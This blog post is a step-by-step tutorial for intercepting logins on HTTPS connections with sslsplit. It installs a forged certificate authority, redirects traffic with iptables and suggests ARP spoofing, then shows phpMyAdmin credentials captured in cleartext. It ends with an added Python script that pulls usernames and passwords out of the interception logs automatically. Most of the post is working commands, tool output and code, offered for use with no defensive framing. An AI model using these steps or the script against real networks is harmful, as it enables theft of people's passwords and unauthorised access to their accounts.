Tuesday, September 27, 2016

how to intercept a password on an SSL connection

sslsplit is a tool for man-in-the-middle (MITM) attacks against SSL/TLS connections: it terminates the client's TLS session with a forged certificate signed by your own CA, opens a second connection to the real server, and so can log the traffic as clear text. For this to work, one of the following has to hold: 1- the user is not careful and does not know much about computers, so they click through the certificate warning; 2- you have privileged access to the client's computer and have installed your CA there; 3- or you have tricked the client into installing your CA beforehand. You also have to sit on the path between client and server (for example as the client's gateway) so that the traffic reaches sslsplit at all.

1- diagram

client --> sslsplit --> https server (phpmyadmin)

- follow the link below to set up HTTPS for phpMyAdmin

- follow steps 1 and 2 of that link to generate another key/certificate pair and copy it to the sslsplit machine. This second pair is the CA that sslsplit uses to sign the forged leaf certificates, so it is the one the client has to trust.

2- install sslsplit package
$ sudo apt-get install sslsplit

3- create a directory for the operation
$ mkdir -p ~/sslsplit/logs && cd ~/sslsplit
- assuming you generated the certificate and key in step 1, copy them to the directory ~/sslsplit

so the sslsplit directory should contain the following files and directory
$ ls ~/sslsplit
ca.crt  ca.key  logs

4- configure nat to direct traffic to sslsplit
$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -F
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
- these PREROUTING rules only see packets that arrive from other hosts, so the client's traffic must already be routed through this machine (it is the client's gateway, or has been made so by ARP spoofing or similar). note also that -F flushes every existing rule in the nat table, not just yours.

5- run sslsplit and wait for the client to access the site
$ sslsplit -D -l connections.log -S logs -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
- -D runs in the foreground with debug output (shown below), -l writes one line per connection to connections.log, -S writes the decrypted content of each connection to its own file under logs/, and each proxy spec gives the type, listen address and port that the iptables rules above redirect to
Generated RSA key for leaf certs.
SSLsplit 0.4.11 (built 2015-11-23)
Copyright (c) 2009-2014, Daniel Roethlisberger <daniel@roe.ch>
Build info: V:FILE
NAT engines: netfilter* tproxy
Local process info support: no
compiled against OpenSSL 1.0.2d 9 Jul 2015 (1000204f)
rtlinked against OpenSSL 1.0.2g  1 Mar 2016 (1000207f)
TLS Server Name Indication (SNI) supported
OpenSSL is thread-safe with THREADID
SSL/TLS protocol availability: ssl3 tls10 tls11 tls12
SSL/TLS algorithm availability: RSA DSA ECDSA DH ECDH EC
compiled against libevent 2.0.21-stable
rtlinked against libevent 2.0.21-stable
1 CPU cores detected
SSL/TLS protocol: negotiate
- []:8080 tcp plain netfilter
- []:8443 ssl plain netfilter
Loaded CA: '/C=US/ST=CA/L=Sancisco/O=Founston/OU=MtionalUnit/CN=Founston CA/name=EasyRSA/emailAddress=ssme@myhost.mydomain'
Using libevent backend 'epoll'
Event base supports: edge yes, O(1) yes, anyfd no
Inserted events:
  0x13eb890 [fd 7] Read Persist
  0x13ecd20 [fd 8] Read Persist
  0x13ecde0 [fd 9] Read Persist
  0x13eb6c8 [fd 6] Read Persist
  0x13ebdc0 [fd 3] Signal Persist
  0x13ec000 [fd 1] Signal Persist
  0x13ec130 [fd 2] Signal Persist
  0x13ec260 [fd 13] Signal Persist
Initialized 2 connection handling threads
Started 2 connection handling threads
Starting main event loop.

6- after the client accesses the site, the logs are written to the directory ~/sslsplit/logs

and inside one of the logs we can see the username and password in clear text,

- snapshot of the sslsplit log showing username root and password password1, captured when the client logged in to the https website
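As an added example (not part of the original post or of sslsplit itself), the script below pulls the login out of the -S content files automatically instead of reading them by eye. It assumes the -S layout from step 5, one file per connection holding the decrypted request and response bytes back to back, named timestamp-srcaddr,srcport-dstaddr,dstport.log, and it relies on phpMyAdmin's login form field names pma_username and pma_password. The embedded sample log is constructed, not a real capture. It goes a little beyond the post by also recognising HTTP Basic authentication headers.

```python
"""Extract login credentials from sslsplit -S content logs.

Added example, not sslsplit's own code. Assumptions: one file per
connection (request and response bytes back to back), file names of the
form YYYYmmddTHHMMSSZ-srcaddr,srcport-dstaddr,dstport.log, and the
phpMyAdmin login fields pma_username / pma_password.
"""
import base64
import re
import sys
from pathlib import Path
from urllib.parse import parse_qs

# Constructed stand-in for one -S file: a GET, its response, then the
# phpMyAdmin login POST and its redirect, exactly as they would be logged.
SAMPLE_LOG_NAME = "20160927T101512Z-192.168.1.50,49832-192.168.1.10,443.log"
SAMPLE_LOG = (
    b"GET /phpmyadmin/ HTTP/1.1\r\nHost: 192.168.1.10\r\n\r\n"
    b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
    b"POST /phpmyadmin/index.php HTTP/1.1\r\n"
    b"Host: 192.168.1.10\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 81\r\n"
    b"\r\n"
    b"pma_username=root&pma_password=password1&server=1&target=index.php&token=deadbeef"
    b"HTTP/1.1 302 Found\r\nLocation: index.php\r\n\r\n"
)

# Field names to try, phpMyAdmin's first, then common generic ones.
FORM_USER_KEYS = ("pma_username", "username", "user", "login")
FORM_PASS_KEYS = ("pma_password", "password", "pass", "passwd")

REQUEST_LINE = re.compile(rb"(?:^|\r\n)(GET|POST|PUT) (\S+) HTTP/1\.[01]\r\n")
NAME_RE = re.compile(r"^(\d{8}T\d{6}Z)-(.+),(\d+)-(.+),(\d+)\.log$")


def parse_filename(name):
    """Connection metadata encoded in the -S file name (assumed layout)."""
    m = NAME_RE.match(name)
    if not m:
        return {}
    ts, src, sport, dst, dport = m.groups()
    return {"time": ts, "src": f"{src}:{sport}", "dst": f"{dst}:{dport}"}


def iter_requests(blob):
    """Yield (method, path, headers, body) for each HTTP request in the blob.

    Request and response bytes sit back to back, so the body is cut at
    Content-Length rather than at the next blank line."""
    for m in REQUEST_LINE.finditer(blob):
        hdr_start = m.end()
        hdr_end = blob.find(b"\r\n\r\n", hdr_start)
        if hdr_end < 0:
            continue
        headers = {}
        for line in blob[hdr_start:hdr_end].split(b"\r\n"):
            k, _, v = line.partition(b":")
            headers[k.strip().lower().decode("latin-1")] = v.strip().decode("latin-1")
        try:
            length = int(headers.get("content-length", "0"))
        except ValueError:
            length = 0
        body = blob[hdr_end + 4:hdr_end + 4 + length]
        yield m.group(1).decode(), m.group(2).decode("latin-1"), headers, body


def credentials_from_request(method, path, headers, body):
    """Return (kind, user, password) if the request carries a login, else None."""
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            user, _, pw = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
            return "basic", user, pw
        except ValueError:
            pass
    if method == "POST" and "application/x-www-form-urlencoded" in headers.get("content-type", ""):
        fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
        user = next((fields[k][0] for k in FORM_USER_KEYS if k in fields), None)
        pw = next((fields[k][0] for k in FORM_PASS_KEYS if k in fields), None)
        if user is not None and pw is not None:
            return "form", user, pw
    return None


def extract_credentials(name, blob):
    """All credentials found in one -S file, tagged with connection metadata."""
    meta = parse_filename(name)
    found = []
    for method, path, headers, body in iter_requests(blob):
        hit = credentials_from_request(method, path, headers, body)
        if hit:
            kind, user, pw = hit
            found.append({**meta, "path": path, "kind": kind, "username": user, "password": pw})
    return found


def scan_logdir(logdir):
    """Run extract_credentials over every *.log file in an -S directory."""
    results = []
    for f in sorted(Path(logdir).glob("*.log")):
        results.extend(extract_credentials(f.name, f.read_bytes()))
    return results


if __name__ == "__main__":
    hits = scan_logdir(sys.argv[1]) if len(sys.argv) > 1 else extract_credentials(SAMPLE_LOG_NAME, SAMPLE_LOG)
    for h in hits:
        print(f"{h.get('time', '?')} {h.get('src', '?')} -> {h.get('dst', '?')} "
              f"{h['path']} [{h['kind']}] {h['username']}:{h['password']}")
```

Run it as `python3 extract.py ~/sslsplit/logs` after step 6; with no argument it runs over the constructed sample. Cutting the body at Content-Length matters because the response that follows the POST is in the same file, and a naive split on blank lines would swallow it into the form data.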
